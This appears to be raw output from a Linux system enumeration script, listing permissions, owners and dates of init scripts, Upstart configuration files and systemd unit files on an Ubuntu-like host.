drwxr-xr-x  2 root root 4096 Aug 30  2017 .
drwxr-xr-x 92 root root 4096 Jan 18  2018 ..
-rwxr-xr-x  1 root root 2243 Feb  9  2016 acpid
-rwxr-xr-x  1 root root 6223 Mar  3  2017 apparmor
-rwxr-xr-x  1 root root 2799 Mar 31  2016 apport
-rwxr-xr-x  1 root root 1071 Dec  6  2015 atd
-rwxr-xr-x  1 root root 1275 Jan 19  2016 bootmisc.sh
-rwxr-xr-x  1 root root 3807 Jan 19  2016 checkfs.sh
-rwxr-xr-x  1 root root 1098 Jan 19  2016 checkroot-bootclean.sh
-rwxr-xr-x  1 root root 9353 Jan 19  2016 checkroot.sh
-rwxr-xr-x  1 root root 1343 Apr  4  2016 console-setup
-rwxr-xr-x  1 root root 3049 Apr  5  2016 cron
-rwxr-xr-x  1 root root  937 Mar 28  2015 cryptdisks
-rwxr-xr-x  1 root root  896 Mar 28  2015 cryptdisks-early
-rwxr-xr-x  1 root root 2813 Dec  2  2015 dbus
-rw-r--r--  1 root root 1264 Aug 30  2017 .depend.boot
-rw-r--r--  1 root root  955 Aug 30  2017 .depend.start
-rw-r--r--  1 root root 1019 Aug 30  2017 .depend.stop
-rwxr-xr-x  1 root root 1105 Mar 15  2016 grub-common
-rwxr-xr-x  1 root root 1336 Jan 19  2016 halt
-rwxr-xr-x  1 root root 1423 Jan 19  2016 hostname.sh
-rwxr-xr-x  1 root root 3809 Mar 12  2016 hwclock.sh
-rwxr-xr-x  1 root root 2372 Apr 11  2016 irqbalance
-rwxr-xr-x  1 root root 1503 Mar 29  2016 iscsid
-rwxr-xr-x  1 root root 1804 Apr  4  2016 keyboard-setup
-rwxr-xr-x  1 root root 1300 Jan 19  2016 killprocs
-rwxr-xr-x  1 root root 2087 Dec 20  2015 kmod
-rwxr-xr-x  1 root root  695 Oct 30  2015 lvm2
-rwxr-xr-x  1 root root  571 Oct 30  2015 lvm2-lvmetad
-rwxr-xr-x  1 root root  586 Oct 30  2015 lvm2-lvmpolld
-rwxr-xr-x  1 root root 2300 Jul  5  2017 lxcfs
-rwxr-xr-x  1 root root 2541 Jun  8  2017 lxd
-rwxr-xr-x  1 root root 2611 Apr 11  2016 mdadm
-rwxr-xr-x  1 root root 1199 Jul 16  2014 mdadm-waitidle
-rwxr-xr-x  1 root root  703 Jan 19  2016 mountall-bootclean.sh
-rwxr-xr-x  1 root root 2301 Jan 19  2016 mountall.sh
-rwxr-xr-x  1 root root 1461 Jan 19  2016 mountdevsubfs.sh
-rwxr-xr-x  1 root root 1564 Jan 19  2016 mountkernfs.sh
-rwxr-xr-x  1 root root  711 Jan 19  2016 mountnfs-bootclean.sh
-rwxr-xr-x  1 root root 2456 Jan 19  2016 mountnfs.sh
-rwxr-xr-x  1 root root 4771 Jul 19  2015 networking
-rwxr-xr-x  1 root root 1581 Oct 16  2015 ondemand
-rwxr-xr-x  1 root root 2503 Mar 29  2016 open-iscsi
-rwxr-xr-x  1 root root 1578 Sep 18  2016 open-vm-tools
-rwxr-xr-x  1 root root 1366 Nov 15  2015 plymouth
-rwxr-xr-x  1 root root  752 Nov 15  2015 plymouth-log
-rwxr-xr-x  1 root root 1192 Sep  6  2015 procps
-rwxr-xr-x  1 root root 6366 Jan 19  2016 rc
-rwxr-xr-x  1 root root  820 Jan 19  2016 rc.local
-rwxr-xr-x  1 root root  117 Jan 19  2016 rcS
-rw-r--r--  1 root root 2427 Jan 19  2016 README
-rwxr-xr-x  1 root root  661 Jan 19  2016 reboot
-rwxr-xr-x  1 root root 4149 Nov 23  2015 resolvconf
-rwxr-xr-x  1 root root 4355 Jul 10  2014 rsync
-rwxr-xr-x  1 root root 2796 Feb  3  2016 rsyslog
-rwxr-xr-x  1 root root 1226 Jun  9  2015 screen-cleanup
-rwxr-xr-x  1 root root 3927 Jan 19  2016 sendsigs
-rwxr-xr-x  1 root root  597 Jan 19  2016 single
-rw-r--r--  1 root root 1087 Jan 19  2016 skeleton
-rwxr-xr-x  1 root root 4077 Mar 16  2017 ssh
-rwxr-xr-x  1 root root 6087 Apr 12  2016 udev
-rwxr-xr-x  1 root root 2049 Aug  7  2014 ufw
-rwxr-xr-x  1 root root 2737 Jan 19  2016 umountfs
-rwxr-xr-x  1 root root 2202 Jan 19  2016 umountnfs.sh
-rwxr-xr-x  1 root root 1879 Jan 19  2016 umountroot
-rwxr-xr-x  1 root root 1391 Apr 20  2017 unattended-upgrades
-rwxr-xr-x  1 root root 3111 Jan 19  2016 urandom
-rwxr-xr-x  1 root root 1306 Jun 14  2017 uuidd


[-] /etc/init/ config file permissions:
total 152
drwxr-xr-x  2 root root 4096 Aug 30  2017 .
drwxr-xr-x 92 root root 4096 Jan 18  2018 ..
-rw-r--r--  1 root root  338 Apr  8  2016 acpid.conf
-rw-r--r--  1 root root 3709 Mar  3  2017 apparmor.conf
-rw-r--r--  1 root root 1626 Jul 17  2017 apport.conf
-rw-r--r--  1 root root  250 Apr  4  2016 console-font.conf
-rw-r--r--  1 root root  509 Apr  4  2016 console-setup.conf
-rw-r--r--  1 root root  297 Apr  5  2016 cron.conf
-rw-r--r--  1 root root 1519 Mar 28  2015 cryptdisks.conf
-rw-r--r--  1 root root  412 Mar 28  2015 cryptdisks-udev.conf
-rw-r--r--  1 root root  482 Sep  1  2015 dbus.conf
-rw-r--r--  1 root root 1247 Jun  1  2015 friendly-recovery.conf
-rw-r--r--  1 root root  284 Jul 23  2013 hostname.conf
-rw-r--r--  1 root root  300 May 21  2014 hostname.sh.conf
-rw-r--r--  1 root root  674 Mar 14  2016 hwclock.conf
-rw-r--r--  1 root root  561 Mar 14  2016 hwclock-save.conf
-rw-r--r--  1 root root  109 Mar 14  2016 hwclock.sh.conf
-rw-r--r--  1 root root  597 Apr 11  2016 irqbalance.conf
-rw-r--r--  1 root root  689 Aug 20  2015 kmod.conf
-rw-r--r--  1 root root  540 Jul  5  2017 lxcfs.conf
-rw-r--r--  1 root root  813 Jun  8  2017 lxd.conf
-rw-r--r--  1 root root 2493 Jun  2  2015 networking.conf
-rw-r--r--  1 root root  933 Jun  2  2015 network-interface.conf
-rw-r--r--  1 root root  530 Jun  2  2015 network-interface-container.conf
-rw-r--r--  1 root root 1756 Jun  2  2015 network-interface-security.conf
-rw-r--r--  1 root root  568 Feb  1  2016 passwd.conf
-rw-r--r--  1 root root  119 Jun  5  2014 procps.conf
-rw-r--r--  1 root root  363 Jun  5  2014 procps-instance.conf
-rw-r--r--  1 root root  457 Jun  3  2015 resolvconf.conf
-rw-r--r--  1 root root  426 Dec  2  2015 rsyslog.conf
-rw-r--r--  1 root root  230 Apr  4  2016 setvtrgb.conf
-rw-r--r--  1 root root  641 Mar 16  2017 ssh.conf
-rw-r--r--  1 root root  337 Apr 12  2016 udev.conf
-rw-r--r--  1 root root  360 Apr 12  2016 udevmonitor.conf
-rw-r--r--  1 root root  352 Apr 12  2016 udevtrigger.conf
-rw-r--r--  1 root root  473 Aug  7  2014 ufw.conf
-rw-r--r--  1 root root  889 Feb 24  2015 ureadahead.conf
-rw-r--r--  1 root root  683 Feb 24  2015 ureadahead-other.conf


[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 8.3M
drwxr-xr-x 26 root root  20K Aug 30  2017 system
drwxr-xr-x  2 root root 4.0K Aug 29  2017 system-sleep
drwxr-xr-x  2 root root 4.0K Aug 29  2017 system-generators
drwxr-xr-x  2 root root 4.0K Aug 29  2017 system-preset
drwxr-xr-x  2 root root 4.0K Aug 29  2017 network
-rwxr-xr-x  1 root root 443K Jul 19  2017 systemd-udevd
-rwxr-xr-x  1 root root 828K Jul 19  2017 systemd-networkd
-rwxr-xr-x  1 root root  31K Jul 19  2017 systemd-reply-password
-rwxr-xr-x  1 root root  91K Jul 19  2017 systemd-rfkill
-rwxr-xr-x  1 root root 143K Jul 19  2017 systemd-shutdown
-rwxr-xr-x  1 root root  71K Jul 19  2017 systemd-sleep
-rwxr-xr-x  1 root root  91K Jul 19  2017 systemd-backlight
-rwxr-xr-x  1 root root  47K Jul 19  2017 systemd-binfmt
-rwxr-xr-x  1 root root 301K Jul 19  2017 systemd-fsck
-rwxr-xr-x  1 root root 276K Jul 19  2017 systemd-initctl
-rwxr-xr-x  1 root root 319K Jul 19  2017 systemd-journald
-rwxr-xr-x  1 root root 605K Jul 19  2017 systemd-logind
-rwxr-xr-x  1 root root  51K Jul 19  2017 systemd-modules-load
-rwxr-xr-x  1 root root  35K Jul 19  2017 systemd-random-seed
-rwxr-xr-x  1 root root 333K Jul 19  2017 systemd-timedated
-rwxr-xr-x  1 root root  35K Jul 19  2017 systemd-user-sessions
-rwxr-xr-x  1 root root  15K Jul 19  2017 systemd-ac-power
-rwxr-xr-x  1 root root 268K Jul 19  2017 systemd-cgroups-agent
-rwxr-xr-x  1 root root 332K Jul 19  2017 systemd-hostnamed
-rwxr-xr-x  1 root root 123K Jul 19  2017 systemd-networkd-wait-online
-rwxr-xr-x  1 root root  35K Jul 19  2017 systemd-quotacheck
-rwxr-xr-x  1 root root 653K Jul 19  2017 systemd-resolved
-rwxr-xr-x  1 root root 139K Jul 19  2017 systemd-timesyncd
-rwxr-xr-x  1 root root 276K Jul 19  2017 systemd-update-utmp
-rwxr-xr-x  1 root root 1.6M Jul 19  2017 systemd
-rwxr-xr-x  1 root root  55K Jul 19  2017 systemd-activate
-rwxr-xr-x  1 root root 103K Jul 19  2017 systemd-bootchart
-rwxr-xr-x  1 root root 352K Jul 19  2017 systemd-bus-proxyd
-rwxr-xr-x  1 root root  91K Jul 19  2017 systemd-cryptsetup
-rwxr-xr-x  1 root root 340K Jul 19  2017 systemd-localed
-rwxr-xr-x  1 root root  51K Jul 19  2017 systemd-remount-fs
-rwxr-xr-x  1 root root  51K Jul 19  2017 systemd-sysctl
-rwxr-xr-x  1 root root  75K Jul 19  2017 systemd-fsckd
-rwxr-xr-x  1 root root  31K Jul 19  2017 systemd-hibernate-resume
-rwxr-xr-x  1 root root  91K Jul 19  2017 systemd-socket-proxyd
-rwxr-xr-x  1 root root 1.3K Jul  5  2017 systemd-sysv-install
drwxr-xr-x  2 root root 4.0K Apr 12  2016 system-shutdown

/lib/systemd/system:
total 932K
lrwxrwxrwx 1 root root    9 Aug 29  2017 screen-cleanup.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Aug 29  2017 halt.target.wants
drwxr-xr-x 2 root root 4.0K Aug 29  2017 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Aug 29  2017 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Aug 29  2017 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Aug 29  2017 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Aug 29  2017 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Aug 29  2017 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Aug 29  2017 sockets.target.wants
lrwxrwxrwx 1 root root   16 Aug 29  2017 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 Aug 29  2017 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root    9 Aug 29  2017 sendsigs.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Aug 29  2017 sigpwr.target.wants
lrwxrwxrwx 1 root root    9 Aug 29  2017 single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 stop-bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 stop-bootlogd-single.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Aug 29  2017 systemd-resolved.service.d
drwxr-xr-x 2 root root 4.0K Aug 29  2017 systemd-timesyncd.service.d
drwxr-xr-x 2 root root 4.0K Aug 29  2017 timers.target.wants
lrwxrwxrwx 1 root root   21 Aug 29  2017 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root    9 Aug 29  2017 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root   27 Aug 29  2017 urandom.service -> systemd-random-seed.service
lrwxrwxrwx 1 root root    9 Aug 29  2017 x11-common.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root   28 Aug 29  2017 kmod.service -> systemd-modules-load.service
drwxr-xr-x 2 root root 4.0K Aug 29  2017 local-fs.target.wants
lrwxrwxrwx 1 root root   28 Aug 29  2017 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root    9 Aug 29  2017 motd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 mountall.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root   22 Aug 29  2017 procps.service -> systemd-sysctl.service
lrwxrwxrwx 1 root root   16 Aug 29  2017 rc.local.service -> rc-local.service
drwxr-xr-x 2 root root 4.0K Aug 29  2017 rc-local.service.d
lrwxrwxrwx 1 root root    9 Aug 29  2017 rc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 rcS.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 reboot.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Aug 29  2017 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Aug 29  2017 resolvconf.service.wants
lrwxrwxrwx 1 root root    9 Aug 29  2017 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root   15 Aug 29  2017 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Aug 29  2017 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 Aug 29  2017 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Aug 29  2017 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Aug 29  2017 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root    9 Aug 29  2017 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 checkroot.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root   13 Aug 29  2017 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root   25 Aug 29  2017 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root   23 Aug 29  2017 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root   22 Aug 29  2017 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root   24 Aug 29  2017 dbus-org.freedesktop.network1.service -> systemd-networkd.service
lrwxrwxrwx 1 root root   24 Aug 29  2017 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service
lrwxrwxrwx 1 root root   25 Aug 29  2017 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
lrwxrwxrwx 1 root root   16 Aug 29  2017 default.target -> graphical.target
lrwxrwxrwx 1 root root    9 Aug 29  2017 fuse.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Aug 29  2017 getty.target.wants
drwxr-xr-x 2 root root 4.0K Aug 29  2017 graphical.target.wants
lrwxrwxrwx 1 root root    9 Aug 29  2017 halt.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 hostname.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 hwclock.service -> /dev/null
lrwxrwxrwx 1 root root   14 Aug 29  2017 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root    9 Aug 29  2017 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Aug 29  2017 bootmisc.service -> /dev/null
-rw-r--r-- 1 root root  683 Aug 23  2017 lxd.service
-rw-r--r-- 1 root root  206 Aug 23  2017 lxd-bridge.service
-rw-r--r-- 1 root root  318 Aug 23  2017 lxd-containers.service
-rw-r--r-- 1 root root  197 Aug 23  2017 lxd.socket
drwxr-xr-x 2 root root 4.0K Aug  1  2017 busnames.target.wants
-rw-r--r-- 1 root root  879 Jul 19  2017 basic.target
-rw-r--r-- 1 root root  379 Jul 19  2017 bluetooth.target
-rw-r--r-- 1 root root  358 Jul 19  2017 busnames.target
-rw-r--r-- 1 root root  770 Jul 19  2017 console-getty.service
-rw-r--r-- 1 root root  742 Jul 19  2017 console-shell.service
-rw-r--r-- 1 root root  791 Jul 19  2017 container-getty@.service
-rw-r--r-- 1 root root  394 Jul 19  2017 cryptsetup-pre.target
-rw-r--r-- 1 root root  366 Jul 19  2017 cryptsetup.target
-rw-r--r-- 1 root root 1010 Jul 19  2017 debug-shell.service
-rw-r--r-- 1 root root  670 Jul 19  2017 dev-hugepages.mount
-rw-r--r-- 1 root root  624 Jul 19  2017 dev-mqueue.mount
-rw-r--r-- 1 root root 1009 Jul 19  2017 emergency.service
-rw-r--r-- 1 root root  431 Jul 19  2017 emergency.target
-rw-r--r-- 1 root root  501 Jul 19  2017 exit.target
-rw-r--r-- 1 root root  440 Jul 19  2017 final.target
-rw-r--r-- 1 root root 1.5K Jul 19  2017 getty@.service
-rw-r--r-- 1 root root  460 Jul 19  2017 getty.target
-rw-r--r-- 1 root root  558 Jul 19  2017 graphical.target
-rw-r--r-- 1 root root  487 Jul 19  2017 halt.target
-rw-r--r-- 1 root root  447 Jul 19  2017 hibernate.target
-rw-r--r-- 1 root root  468 Jul 19  2017 hybrid-sleep.target
-rw-r--r-- 1 root root  630 Jul 19  2017 initrd-cleanup.service
-rw-r--r-- 1 root root  553 Jul 19  2017 initrd-fs.target
-rw-r--r-- 1 root root  790 Jul 19  2017 initrd-parse-etc.service
-rw-r--r-- 1 root root  526 Jul 19  2017 initrd-root-fs.target
-rw-r--r-- 1 root root  640 Jul 19  2017 initrd-switch-root.service
-rw-r--r-- 1 root root  691 Jul 19  2017 initrd-switch-root.target
-rw-r--r-- 1 root root  671 Jul 19  2017 initrd.target
-rw-r--r-- 1 root root  664 Jul 19  2017 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root  501 Jul 19  2017 kexec.target
-rw-r--r-- 1 root root  677 Jul 19  2017 kmod-static-nodes.service
-rw-r--r-- 1 root root  395 Jul 19  2017 local-fs-pre.target
-rw-r--r-- 1 root root  507 Jul 19  2017 local-fs.target
-rw-r--r-- 1 root root  405 Jul 19  2017 machine.slice
-rw-r--r-- 1 root root  473 Jul 19  2017 mail-transport-agent.target
-rw-r--r-- 1 root root  492 Jul 19  2017 multi-user.target
-rw-r--r-- 1 root root  464 Jul 19  2017 network-online.target
-rw-r--r-- 1 root root  461 Jul 19  2017 network-pre.target
-rw-r--r-- 1 root root  480 Jul 19  2017 network.target
-rw-r--r-- 1 root root  514 Jul 19  2017 nss-lookup.target
-rw-r--r-- 1 root root  473 Jul 19  2017 nss-user-lookup.target
-rw-r--r-- 1 root root  354 Jul 19  2017 paths.target
-rw-r--r-- 1 root root  552 Jul 19  2017 poweroff.target
-rw-r--r-- 1 root root  377 Jul 19  2017 printer.target
-rw-r--r-- 1 root root  693 Jul 19  2017 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root  603 Jul 19  2017 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root  568 Jul 19  2017 quotaon.service
-rw-r--r-- 1 root root  612 Jul 19  2017 rc-local.service
-rw-r--r-- 1 root root  543 Jul 19  2017 reboot.target
-rw-r--r-- 1 root root  396 Jul 19  2017 remote-fs-pre.target
-rw-r--r-- 1 root root  482 Jul 19  2017 remote-fs.target
-rw-r--r-- 1 root root  978 Jul 19  2017 rescue.service
-rw-r--r-- 1 root root  486 Jul 19  2017 rescue.target
-rw-r--r-- 1 root root  500 Jul 19  2017 rpcbind.target
-rw-r--r-- 1 root root 1.1K Jul 19  2017 serial-getty@.service
-rw-r--r-- 1 root root  402 Jul 19  2017 shutdown.target
-rw-r--r-- 1 root root  362 Jul 19  2017 sigpwr.target
-rw-r--r-- 1 root root  420 Jul 19  2017 sleep.target
-rw-r--r-- 1 root root  403 Jul 19  2017 -.slice
-rw-r--r-- 1 root root  409 Jul 19  2017 slices.target
-rw-r--r-- 1 root root  380 Jul 19  2017 smartcard.target
-rw-r--r-- 1 root root  356 Jul 19  2017 sockets.target
-rw-r--r-- 1 root root  380 Jul 19  2017 sound.target
-rw-r--r-- 1 root root  441 Jul 19  2017 suspend.target
-rw-r--r-- 1 root root  353 Jul 19  2017 swap.target
-rw-r--r-- 1 root root  715 Jul 19  2017 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root  518 Jul 19  2017 sysinit.target
-rw-r--r-- 1 root root  719 Jul 19  2017 sys-kernel-config.mount
-rw-r--r-- 1 root root  662 Jul 19  2017 sys-kernel-debug.mount
-rw-r--r-- 1 root root 1.3K Jul 19  2017 syslog.socket
-rw-r--r-- 1 root root  646 Jul 19  2017 systemd-ask-password-console.path
-rw-r--r-- 1 root root  653 Jul 19  2017 systemd-ask-password-console.service
-rw-r--r-- 1 root root  574 Jul 19  2017 systemd-ask-password-wall.path
-rw-r--r-- 1 root root  681 Jul 19  2017 systemd-ask-password-wall.service
-rw-r--r-- 1 root root  724 Jul 19  2017 systemd-backlight@.service
-rw-r--r-- 1 root root  959 Jul 19  2017 systemd-binfmt.service
-rw-r--r-- 1 root root  650 Jul 19  2017 systemd-bootchart.service
-rw-r--r-- 1 root root 1.0K Jul 19  2017 systemd-bus-proxyd.service
-rw-r--r-- 1 root root  409 Jul 19  2017 systemd-bus-proxyd.socket
-rw-r--r-- 1 root root  497 Jul 19  2017 systemd-exit.service
-rw-r--r-- 1 root root  551 Jul 19  2017 systemd-fsckd.service
-rw-r--r-- 1 root root  540 Jul 19  2017 systemd-fsckd.socket
-rw-r--r-- 1 root root  674 Jul 19  2017 systemd-fsck-root.service
-rw-r--r-- 1 root root  648 Jul 19  2017 systemd-fsck@.service
-rw-r--r-- 1 root root  544 Jul 19  2017 systemd-halt.service
-rw-r--r-- 1 root root  631 Jul 19  2017 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root  501 Jul 19  2017 systemd-hibernate.service
-rw-r--r-- 1 root root  710 Jul 19  2017 systemd-hostnamed.service
-rw-r--r-- 1 root root  778 Jul 19  2017 systemd-hwdb-update.service
-rw-r--r-- 1 root root  519 Jul 19  2017 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root  480 Jul 19  2017 systemd-initctl.service
-rw-r--r-- 1 root root  524 Jul 19  2017 systemd-initctl.socket
-rw-r--r-- 1 root root  607 Jul 19  2017 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.1K Jul 19  2017 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root 1.3K Jul 19  2017 systemd-journald.service
-rw-r--r-- 1 root root  842 Jul 19  2017 systemd-journald.socket
-rw-r--r-- 1 root root  731 Jul 19  2017 systemd-journal-flush.service
-rw-r--r-- 1 root root  557 Jul 19  2017 systemd-kexec.service
-rw-r--r-- 1 root root  691 Jul 19  2017 systemd-localed.service
-rw-r--r-- 1 root root 1.2K Jul 19  2017 systemd-logind.service
-rw-r--r-- 1 root root  693 Jul 19  2017 systemd-machine-id-commit.service
-rw-r--r-- 1 root root  967 Jul 19  2017 systemd-modules-load.service
-rw-r--r-- 1 root root 1.3K Jul 19  2017 systemd-networkd.service
-rw-r--r-- 1 root root  591 Jul 19  2017 systemd-networkd.socket
-rw-r--r-- 1 root root  685 Jul 19  2017 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root  553 Jul 19  2017 systemd-poweroff.service
-rw-r--r-- 1 root root  614 Jul 19  2017 systemd-quotacheck.service
-rw-r--r-- 1 root root  717 Jul 19  2017 systemd-random-seed.service
-rw-r--r-- 1 root root  548 Jul 19  2017 systemd-reboot.service
-rw-r--r-- 1 root root  757 Jul 19  2017 systemd-remount-fs.service
-rw-r--r-- 1 root root  907 Jul 19  2017 systemd-resolved.service
-rw-r--r-- 1 root root  696 Jul 19  2017 systemd-rfkill.service
-rw-r--r-- 1 root root  617 Jul 19  2017 systemd-rfkill.socket
-rw-r--r-- 1 root root  497 Jul 19  2017 systemd-suspend.service
-rw-r--r-- 1 root root  649 Jul 19  2017 systemd-sysctl.service
-rw-r--r-- 1 root root  655 Jul 19  2017 systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Jul 19  2017 systemd-timesyncd.service
-rw-r--r-- 1 root root  598 Jul 19  2017 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  450 Jul 19  2017 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root  703 Jul 19  2017 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root  683 Jul 19  2017 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root  578 Jul 19  2017 systemd-udevd-control.socket
-rw-r--r-- 1 root root  570 Jul 19  2017 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root  825 Jul 19  2017 systemd-udevd.service
-rw-r--r-- 1 root root  823 Jul 19  2017 systemd-udev-settle.service
-rw-r--r-- 1 root root  743 Jul 19  2017 systemd-udev-trigger.service
-rw-r--r-- 1 root root  757 Jul 19  2017 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root  754 Jul 19  2017 systemd-update-utmp.service
-rw-r--r-- 1 root root  573 Jul 19  2017 systemd-user-sessions.service
-rw-r--r-- 1 root root  436 Jul 19  2017 system.slice
-rw-r--r-- 1 root root  585 Jul 19  2017 system-update.target
-rw-r--r-- 1 root root  405 Jul 19  2017 timers.target
-rw-r--r-- 1 root root  395 Jul 19  2017 time-sync.target
-rw-r--r-- 1 root root  417 Jul 19  2017 umount.target
-rw-r--r-- 1 root root  528 Jul 19  2017 user@.service
-rw-r--r-- 1 root root  392 Jul 19  2017 user.slice
-rw-r--r-- 1 root root  342 Jul 17  2017 getty-static.service
-rw-r--r-- 1 root root  153 Jul 17  2017 sigpwr-container-shutdown.service
-rw-r--r-- 1 root root  175 Jul 17  2017 systemd-networkd-resolvconf-update.path
-rw-r--r-- 1 root root  715 Jul 17  2017 systemd-networkd-resolvconf-update.service
-rw-r--r-- 1 root root  192 Jul 17  2017 snapd.autoimport.service
-rw-r--r-- 1 root root  368 Jul 17  2017 snapd.core-fixup.service
-rw-r--r-- 1 root root  290 Jul 17  2017 snapd.refresh.service
-rw-r--r-- 1 root root  323 Jul 17  2017 snapd.refresh.timer
-rw-r--r-- 1 root root  212 Jul 17  2017 snapd.service
-rw-r--r-- 1 root root  281 Jul 17  2017 snapd.socket
-rw-r--r-- 1 root root  474 Jul 17  2017 snapd.system-shutdown.service
-rw-r--r-- 1 root root  642 Jul 14  2017 mongod.service
-rw-r--r-- 1 root root  311 Jul  5  2017 lxcfs.service
-rw-r--r-- 1 root root  169 Jun 19  2017 apt-daily.service
-rw-r--r-- 1 root root  212 Jun 19  2017 apt-daily.timer
-rw-r--r-- 1 root root  202 Jun 19  2017 apt-daily-upgrade.service
-rw-r--r-- 1 root root  184 Jun 19  2017 apt-daily-upgrade.timer
-rw-r--r-- 1 root root  189 Jun 14  2017 uuidd.service
-rw-r--r-- 1 root root  126 Jun 14  2017 uuidd.socket
-rw-r--r-- 1 root root  345 Apr 20  2017 unattended-upgrades.service
-rw-r--r-- 1 root root  385 Mar 16  2017 ssh.service
-rw-r--r-- 1 root root  196 Mar 16  2017 ssh@.service
-rw-r--r-- 1 root root  216 Mar 16  2017 ssh.socket
-rw-r--r-- 1 root root  269 Jan 31  2017 setvtrgb.service
-rw-r--r-- 1 root root  491 Jan 12  2017 dbus.service
-rw-r--r-- 1 root root  106 Jan 12  2017 dbus.socket
-rw-r--r-- 1 root root  420 Dec  7  2016 resolvconf.service
-rw-r--r-- 1 root root  735 Nov 30  2016 networking.service
-rw-r--r-- 1 root root  497 Nov 30  2016 ifup@.service
-rw-r--r-- 1 root root  631 Nov  3  2016 accounts-daemon.service
-rw-r--r-- 1 root root  251 Sep 18  2016 open-vm-tools.service
-rw-r--r-- 1 root root  285 Jun 16  2016 keyboard-setup.service
-rw-r--r-- 1 root root  288 Jun 16  2016 console-setup.service
lrwxrwxrwx 1 root root   27 May 10  2016 plymouth-log.service -> plymouth-read-write.service
lrwxrwxrwx 1 root root   21 May 10  2016 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root  412 May 10  2016 plymouth-halt.service
-rw-r--r-- 1 root root  426 May 10  2016 plymouth-kexec.service
-rw-r--r-- 1 root root  421 May 10  2016 plymouth-poweroff.service
-rw-r--r-- 1 root root  194 May 10  2016 plymouth-quit.service
-rw-r--r-- 1 root root  200 May 10  2016 plymouth-quit-wait.service
-rw-r--r-- 1 root root  244 May 10  2016 plymouth-read-write.service
-rw-r--r-- 1 root root  416 May 10  2016 plymouth-reboot.service
-rw-r--r-- 1 root root  532 May 10  2016 plymouth-start.service
-rw-r--r-- 1 root root  291 May 10  2016 plymouth-switch-root.service
-rw-r--r-- 1 root root  490 May 10  2016 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root  467 May 10  2016 systemd-ask-password-plymouth.service
lrwxrwxrwx 1 root root    9 Apr 16  2016 lvm2.service -> /dev/null
